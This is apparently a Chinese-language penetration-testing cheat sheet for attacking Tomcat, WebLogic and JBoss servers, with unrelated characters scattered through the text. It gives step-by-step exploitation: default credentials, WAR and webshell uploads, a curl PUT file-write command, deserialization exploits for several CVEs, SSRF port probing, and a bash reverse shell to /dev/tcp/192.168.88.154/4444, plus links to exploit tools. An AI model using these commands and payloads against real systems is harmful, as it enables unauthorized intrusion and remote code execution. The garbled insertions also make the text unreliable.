一完域、Tomcat
1栏渺、弱口令
(1)將shell.jsp壓縮成shell.zip
(2)將后綴名改成shell.war
(3)192.168.88.152:8080/manager/html上傳war包
(4)訪問http://192.168.88.152:8080/shell/shell.jsp即可getshell
2、PUT方法寫文件漏洞
curl -X PUT http://192.168.88.152:8080/shell.jsp/ -d @- < shell.jsp
使用" / "可繞過文件后綴的檢測凯傲。
二犬辰、Weblogic
1、弱口令
weblogic后臺:http://192.168.88.152:7001/console
常見弱口令:weblogic/weblogic冰单、weblogic/Oracle@123幌缝、system/system
2、XMLDecoder反序列化(CVE-2017-10271)
(1)寫文件
(2)/dev/tcp反彈shell
3诫欠、T3協(xié)議反序列化(CVE-2018-2628)涵卵,需要通過T3協(xié)議觸發(fā)
(1)使用nmap掃描是否開啟t3協(xié)議
nmap 192.168.88.152 -p7001 --script="weblogic-t3-info.nse"
(2)使用CVE-2018-2628-poc.py測試是否存在漏洞
(3)使用K8飛刀上傳webshell
(4)使用cve-2018-2628.py連接webshell
工具:https://github.com/jas502n/CVE-2018-2628
4、任意文件上傳漏洞(CVE-2018-2894)荒叼,需要啟用web服務(wù)測試頁
(1)http://192.168.88.152:7001/ws_utc/config.do頁面存在未授權(quán)訪問
(2)將Work Home Dir設(shè)置為css目錄
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
(3)點擊安全--增加轿偎,然后上傳webshell
(4)根據(jù)返回的時間戳,構(gòu)造webshell地址
http://192.168.88.152:7001/ws_utc/css/config/keystore/1545874426954_muma.jsp?pwd=023&i=whoami
工具:https://github.com/LandGrey/CVE-2018-2894
5被廓、SSRF
漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp坏晦,訪問以下url地址:
http://192.168.88.152:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
端口開放,返回error code
端口關(guān)閉,返回could not connect over HTTP to server
如果目標開放了redis服務(wù)昆婿,可結(jié)合未授權(quán)訪問進行攻擊球碉。
三、Jboss
1挖诸、JMX反序列化
使用DeserializeExploit.jar進行測試
2汁尺、5.x/6.x 反序列化漏洞(CVE-2017-12149)
工具:https://github.com/yunxu1/jboss-_CVE-2017-12149
3、JMS 反序列化(CVE-2017-7504)
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.88.154/4444 0>&1"
curl http://192.168.88.152:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
工具:https://github.com/joaomatosf/JavaDeserH2HC